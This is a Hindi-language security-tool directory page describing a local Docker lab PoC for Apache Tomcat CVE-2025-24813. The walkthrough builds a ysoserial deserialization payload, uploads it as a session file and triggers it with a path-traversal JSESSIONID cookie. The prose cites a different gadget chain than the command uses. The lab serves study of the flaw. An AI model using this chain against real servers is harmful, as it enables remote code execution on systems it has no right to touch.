Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
POC-CVE-2025-24813 — प्रूफ-ऑफ-कॉन्सेप्ट जो Apache Tomcat CVE-2025-24813 को प्रदर्शित करता है, असुरक्षित DefaultServlet PUT और सत्र डिसीरियलाइज़ेशन का शोषण करके रिमोट कोड निष्पादन प्राप्त करता है। | Kitploit
उपकरण/GitHubGitHub/arthurabriel/poc-cve-2025-24813
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubarthurabriel/poc-cve-2025-24813

POC-CVE-2025-24813

प्रूफ-ऑफ-कॉन्सेप्ट जो Apache Tomcat CVE-2025-24813 को प्रदर्शित करता है, असुरक्षित DefaultServlet PUT और सत्र डिसीरियलाइज़ेशन का शोषण करके रिमोट कोड निष्पादन प्राप्त करता है।

रिपॉजिटरी देखें
69 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-24813 – प्रदर्शन वातावरण (PoC)

यह रिपॉजिटरी CVE-2025-24813 के व्यवहार का निरीक्षण करने के लिए बनाई गई एक सरल एप्लिकेशन है, जो Apache Tomcat में एक हालिया कमजोरी है, जो DefaultServlet के लेखन-सक्षम (readonly=false) उपयोग से संबंधित है, जो HTTP PUT (partial PUT / Content-Range समर्थन सहित) के माध्यम से असुरक्षित लेखन कार्यों की अनुमति देती है, जो संवेदनशील फ़ाइलों को अधिलेखित कर सकती है, जिसमें सत्र फ़ाइलें भी शामिल हैं — जिससे दुर्भावनापूर्ण डिसीरियलाइज़ेशन होने पर RCE परिदृश्य संभव हो जाते हैं।

इस PoC के बारे में

एप्लिकेशन उपयोग करता है:

घटककार्य
Tomcat 9 + JDK 11लक्ष्य के रूप में उपयोग किया गया कमजोर सर्वर
context.xmlPersistentManager + FileStore को सक्षम करता है जो सत्रों को डिस्क पर सहेजता है
upload.jspसरल एंडपॉइंट जो डेटा प्राप्त करता है और डिस्क पर लिखता है
/tmp/app-data/वह निर्देशिका जहाँ अपलोड सहेजे जाएँगे

प्रारंभिक विचार यह देखना है कि Tomcat CVE के अध्ययन के लिए कॉन्फ़िगर किए गए वातावरण में फ़ाइलों को कैसे संभालता है — एक हानिरहित अनुरोध से शुरू करके, जो केवल नियंत्रित तरीके से एक फ़ाइल लिखता है (बिना शोषण प्रयास के) और फिर एक दुर्भावनापूर्ण फ़ाइल।

बिल्ड और निष्पादन

  1. Docker इमेज बनाएँ
root@kitploit:~
docker build -t tomcat-cve-2025-24813 .
  1. कंटेनर चलाएँ
root@kitploit:~
docker run -d --name toy-cve -p 8080:8080 tomcat-cve-2025-24813

syscalls execve की निगरानी

दूसरे टर्मिनल में नीचे दिए गए कमांड चलाएँ।

root@kitploit:~
PID=$(docker inspect -f '{{.State.Pid}}' toy-cve)
sudo strace -f -p $PID -e trace=execve -s 200

प्रारंभिक परीक्षण (अच्छा और सुरक्षित अनुरोध)

हम सामान्य व्यवहार का निरीक्षण करने के लिए एक सरल फ़ाइल भेजेंगे।

एक स्ट्रिंग भेजकर अपलोड करें

root@kitploit:~
echo "Arquivo Normal" > nota.txt

curl -X POST http://localhost:8080/upload.jsp \
  -H "X-Filename: nota.txt" \
  --data-binary "Essa é apenas uma mensagem simples."

यदि सब कुछ सही है, तो strace चलाने वाले टर्मिनल में कुछ भी दिखाई नहीं देना चाहिए।

नोट: यदि strace में SIGSEGV त्रुटियाँ दिखाई देती हैं, तो उन्हें अनदेखा करें। वे JVM के शोर हैं।

कमजोरी का शोषण

  1. YSoSerial डाउनलोड करें ज्ञात गैजेट श्रृंखलाओं के साथ जावा क्रमबद्ध ऑब्जेक्ट उत्पन्न करने के लिए उपयोग किया जाने वाला उपकरण।
root@kitploit:~
wget -O ysoserial-all.jar https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
  1. सत्र प्रारूप में दुर्भावनापूर्ण पेलोड उत्पन्न करें

यहाँ हम CommonsCollections4 श्रृंखला का उपयोग एक ऑब्जेक्ट उत्पन्न करने के लिए करते हैं जो, एक कमजोर परिदृश्य में, touch /tmp/RCE कमांड को निष्पादित कर सकता है। पेलोड को hack.session के रूप में सहेजा जाएगा।

root@kitploit:~
java -jar ysoserial-all.jar CommonsCollections6 'touch /tmp/RCE' > hack.session

यदि पिछला कमांड त्रुटि देता है, तो इसका कारण यह है कि जावा के आधुनिक संस्करणों (9+) के साथ संगतता सुनिश्चित करने के लिए, मजबूत एनकैप्सुलेशन (JPMS) को निष्क्रिय करने के लिए --add-opens फ्लैग जोड़ना आवश्यक है, जो अन्यथा ysoserial द्वारा उपयोग किए जाने वाले रिफ्लेक्शन को अवरुद्ध करेगा।

root@kitploit:~
java --add-opens java.base/java.util=ALL-UNNAMED -jar ysoserial-all.jar CommonsCollections6 'touch /tmp/RCE' > hack.session

इस कमांड के बाद आपके पास एक स्थानीय बाइनरी फ़ाइल होगी:

root@kitploit:~
hack.session
  1. सर्वर पर पेलोड अपलोड करें

हम .session फ़ाइल को JSP एंडपॉइंट पर भेजते हैं, जो सामग्री को सीधे /tmp/app-data निर्देशिका में लिखता है।

root@kitploit:~
curl -v -X POST \
     -H "X-Filename: hack.session" \
     --data-binary @hack.session \
     http://localhost:8080/upload.jsp

अपेक्षित आउटपुट:

फ़ाइल सफलतापूर्वक सहेजी गई: /tmp/app-data/hack.session

📌 इस समय कोई कमांड निष्पादित नहीं होता है — केवल सर्वर पर फ़ाइल लेखन हुआ है।

  1. इंजेक्टेड सत्र का उपयोग करें

अब हम कुकी JSESSIONID=hack भेजकर एक अनुरोध करते हैं, टॉमकैट को नवनिर्मित सत्र लोड करने के लिए मजबूर करने का प्रयास करते हैं।

root@kitploit:~
 curl -v http://localhost:8080/index.jsp -H "Cookie: JSESSIONID=../../../../../../tmp/app-data/hack"

strace टर्मिनल में देखने पर execve कमांड द्वारा फ़ाइल बनाने के संकेत दिखाई देने चाहिए।

यह देखने के लिए कि फ़ाइल बनाई गई है या नहीं, हम कंटेनर में प्रवेश करके भी जाँच सकते हैं

root@kitploit:~
docker exec -it toy-cve ls -l /tmp/
टूल डाउनलोड करें